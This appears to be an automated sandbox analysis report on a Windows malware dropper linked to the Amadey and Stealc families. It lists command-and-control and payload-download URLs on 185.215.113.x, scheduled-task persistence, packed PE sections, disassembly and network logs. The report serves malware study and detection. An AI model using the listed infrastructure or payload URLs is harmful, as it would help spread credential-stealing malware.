Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	641 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.215.113.19/Vi9leo/index.phpO	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exeded	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exe6522427f	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php0	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpWindows	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php00	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exe	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpb	100%	Avira URL Cloud	phishing
http://185.215.113.16/fae1daa8e9eb4fff7b5c630804042ba5ce9024154500m	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exel	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exe00	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exem32	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpoft	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpw_b	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php0=	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/steam/random.exeded	explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php0	explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpO	explorti.exe, 00000006.00000002.2932965487.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exe6522427f	explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpWindows	explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php00	explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exe	explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpb	explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/fae1daa8e9eb4fff7b5c630804042ba5ce9024154500m	explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exel	explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exe00	explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exem32	explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpoft	explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpw_b	explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php0=	explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.19	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502468
Start date and time:	2024-09-01 17:35:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@0/2
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target explorti.exe, PID 7436 because there are no executed function
Execution Graph export aborted for target explorti.exe, PID 7456 because there are no executed function
Execution Graph export aborted for target file.exe, PID 7252 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:37:01	API Interceptor	173131x Sleep call for process: explorti.exe modified
16:36:02	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.19	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1900032
Entropy (8bit):	7.953681123547953
Encrypted:	false
SSDEEP:	49152:bxqFd8IXr3G0NPQQdiwHm+34RapwXKby8Y3O:bxqbhrGoPQQJHlp9Ye
MD5:	0F2694844EB16391E15196E17E545F0B
SHA1:	CB6CBD6A90349AFA4624A221B3350AF44FEB4D71
SHA-256:	53F9B3B2EA25424BAF94DA442973F4EFD71E1218A3B837600334D97898EBFD7E
SHA-512:	51179C080CE6DCE08E8C78E392E20D283C0052E91ED3C4C651B9E53741A3C720F6E87D393EAF0CF8BED54A85D4C92699910B5D0FE237F8DBDCC75D6FE9CD3CD6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f.............................0K...........@..........................`K...........@.................................W...k.............................K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...wugfyyhr.....01.....................@...mmvmwoim..... K.....................@....taggant.0...0K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	288
Entropy (8bit):	3.4429251365730273
Encrypted:	false
SSDEEP:	6:hXhgX4RKUEZ+lX1cI1l6lm6tPjgsW2YRZuy0lbEtze1lEt0:zK4RKQ1cag7jzvYRQVAtzqut0
MD5:	2B2A3A4CAB4E75337101DA97B62ACF22
SHA1:	59764E821718F6F214403AEF0B255A1999977EE2
SHA-256:	6542529AB5C06C0BB7634BAA48D0E25F2F588A0AD0DC75532ABD3620B7227C84
SHA-512:	495B565E355DF51BB7748951865F03B1E40029A65A4758693E2B778E7F4ABBDD3D02B7D8EC659D75160090E55FE5EA175B8C11FDBEC2178E312F9C5BD3496FF6
Malicious:	false
Reputation:	low
Preview:	.....K'....J......X.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................%.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.953681123547953
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'900'032 bytes
MD5:	0f2694844eb16391e15196e17e545f0b
SHA1:	cb6cbd6a90349afa4624a221b3350af44feb4d71
SHA256:	53f9b3b2ea25424baf94da442973f4efd71e1218a3b837600334d97898ebfd7e
SHA512:	51179c080ce6dce08e8c78e392e20d283c0052e91ed3c4c651b9e53741a3c720f6e87d393eaf0cf8bed54a85d4c92699910b5d0fe237f8dbdcc75d6fe9cd3cd6
SSDEEP:	49152:bxqFd8IXr3G0NPQQdiwHm+34RapwXKby8Y3O:bxqbhrGoPQQJHlp9Ye
TLSH:	889533BC4DE32BFECC50CC7AA431D30F59D6EE6A98D10584BF6464EEA1C9723086649D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8b3000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FFAACCFCF0Ah
paddusb mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FFAACCFEF05h
inc ecx
push bx
dec esi
dec ebp
das
xor al, 36h
dec edi
bound ecx, dword ptr [ecx+4Ah]
dec edx
insd
push edi
dec eax
dec eax
jbe 00007FFAACCFCF72h
push esi
dec edx
popad
je 00007FFAACCFCF6Bh
push edx
dec esi
jc 00007FFAACCFCF7Ah
cmp byte ptr [ebx], dh
push edx
jns 00007FFAACCFCF47h
or eax, 49674B0Ah
cmp byte ptr [edi+43h], dl
jnc 00007FFAACCFCF4Dh
bound eax, dword ptr [ecx+30h]
pop edx
inc edi
push esp
push 43473163h
aaa
push edi
dec esi
xor ebp, dword ptr [ebx+59h]
push edi
push edx
pop eax
je 00007FFAACCFCF57h
xor dl, byte ptr [ebx+2Bh]
popad
jne 00007FFAACCFCF4Ch
dec eax
dec ebp
jo 00007FFAACCFCF43h
xor dword ptr [edi], esi
inc esp
dec edx
dec ebp
jns 00007FFAACCFCF50h
insd
jnc 00007FFAACCFCF70h
aaa
inc esp
inc ecx
inc ebx
xor dl, byte ptr [ecx+4Bh]
inc edx
inc esp
bound esi, dword ptr [ebx]
or eax, 63656B0Ah
jno 00007FFAACCFCF58h
push edx
insb
js 00007FFAACCFCF71h
outsb
inc ecx
jno 00007FFAACCFCF52h
push ebp
inc esi
pop edx
xor eax, dword ptr [ebx+36h]
push eax
aaa
imul edx, dword ptr [ebx+58h], 4Eh
aaa
inc ebx
jbe 00007FFAACCFCF4Ch
dec ebx
js 00007FFAACCFCF43h
jne 00007FFAACCFCF31h
push esp
inc bp
outsb
inc edx
popad
dec ebx
insd
dec ebp
inc edi
xor dword ptr [ecx+36h], esp
push 0000004Bh
sub eax, dword ptr [ebp+33h]
jp 00007FFAACCFCF5Ch
dec edx
xor bh, byte ptr [edx+56h]
bound eax, dword ptr [edi+66h]
jbe 00007FFAACCFCF3Ah
dec eax
or eax, 506C720Ah
aaa
xor dword ptr fs:[ebp+62h], ecx
arpl word ptr [esi], si
inc esp
jo 00007FFAACCFCF73h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b13d4	0x10	wugfyyhr
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b1384	0x18	wugfyyhr
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	f5502b320b12412e8336f0d5e1173c5f	False	0.9996691427595629	data	7.978167044065446	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	a6ff479f775776f9454f78f60c8924a1	False	0.58203125	data	4.507732056601817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a8000	0x200	1c37394bcad8e11ec877dc50d286484a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wugfyyhr	0x313000	0x19f000	0x19e600	9635850d5c2e455d716a41c1a8a4d44d	False	0.9944699754901961	data	7.953087307539596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mmvmwoim	0x4b2000	0x1000	0x400	6fae0b38dbdcfeacf3f27c3b6fe5cb6b	False	0.783203125	data	6.1354089192973875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b3000	0x3000	0x2200	c476f2b37d045b5011ae7d3c3dcd02a1	False	0.39051011029411764	DOS executable (COM)	4.214934926183452	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4b13e4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-01T17:37:04.208529+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	49775	80	192.168.2.4	185.215.113.19
2024-09-01T17:37:19.841016+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	1	80	49775	185.215.113.19	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 17:37:02.365422010 CEST	49763	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.370364904 CEST	80	49763	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.370471954 CEST	49763	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.370641947 CEST	49763	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.375829935 CEST	80	49763	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.375844002 CEST	80	49763	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.375936031 CEST	49763	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.375987053 CEST	49763	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.377037048 CEST	49764	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.380858898 CEST	80	49763	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.380964994 CEST	80	49763	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.381865025 CEST	80	49764	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.381980896 CEST	49764	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.382051945 CEST	49764	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.387080908 CEST	80	49764	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.387193918 CEST	80	49764	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.387207031 CEST	49764	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.387253046 CEST	49764	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.393137932 CEST	80	49764	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.393213987 CEST	80	49764	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.502090931 CEST	49765	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.508363962 CEST	80	49765	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.508498907 CEST	49765	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.508703947 CEST	49765	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.515953064 CEST	80	49765	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.516022921 CEST	49765	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.516055107 CEST	49765	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.516346931 CEST	80	49765	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.519754887 CEST	49766	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.524631977 CEST	80	49765	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.524635077 CEST	80	49765	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.525700092 CEST	80	49766	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.525783062 CEST	49766	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.525935888 CEST	49766	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.531183004 CEST	80	49766	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.532484055 CEST	80	49766	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.642769098 CEST	49767	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.650940895 CEST	80	49767	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.651078939 CEST	49767	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.651249886 CEST	49767	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.659882069 CEST	80	49767	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.659885883 CEST	80	49767	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.659950972 CEST	49767	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.659990072 CEST	49767	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.660746098 CEST	49768	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.672836065 CEST	80	49767	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.673106909 CEST	80	49767	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.673485041 CEST	80	49768	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.673583984 CEST	49768	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.673691988 CEST	49768	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.680001020 CEST	80	49768	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.680080891 CEST	49768	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.680102110 CEST	49768	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.680218935 CEST	80	49768	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.686595917 CEST	80	49768	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.686609030 CEST	80	49768	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.785115957 CEST	49769	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.790251017 CEST	80	49769	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.790338039 CEST	49769	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.790514946 CEST	49769	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.797772884 CEST	80	49769	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.797777891 CEST	80	49769	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.797856092 CEST	49769	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.797874928 CEST	49769	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.798883915 CEST	49770	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.808660030 CEST	80	49769	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.808666945 CEST	80	49769	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.809746027 CEST	80	49770	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.809844971 CEST	49770	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.809947968 CEST	49770	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.815577030 CEST	80	49770	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.815722942 CEST	80	49770	185.215.113.19	192.168.2.4
